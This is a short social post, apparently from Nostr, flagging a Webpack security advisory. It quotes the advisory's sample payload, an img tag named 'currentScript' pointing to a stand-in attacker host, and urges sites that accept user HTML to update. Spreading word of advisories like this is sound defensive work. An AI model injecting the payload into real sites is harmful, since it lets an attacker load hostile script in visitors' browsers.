Why Nostr? What is Njump?
2024-08-28 16:40:52

Tek is not a convicted felon on Nostr: Webpack has a new security advisory: > The attacker only needs to insert an iimgtag ...

Webpack has a new security advisory: https://github.com/advisories/GHSA-4vvj-4cpr-p986

> The attacker only needs to insert an iimgtag with the name attribute set to currentScript.
>
> […]
>
> <img name="currentScript" src="https://attacker.controlled.server/"></img>;

If you use webpack and your site allows users to enter any HTML at all, you might wanna look at updating.
Author Public Key
npub13e30hnrpg768tslwwjveafaazctk7ghf9va2se2k4ygr8cj24veshclhjj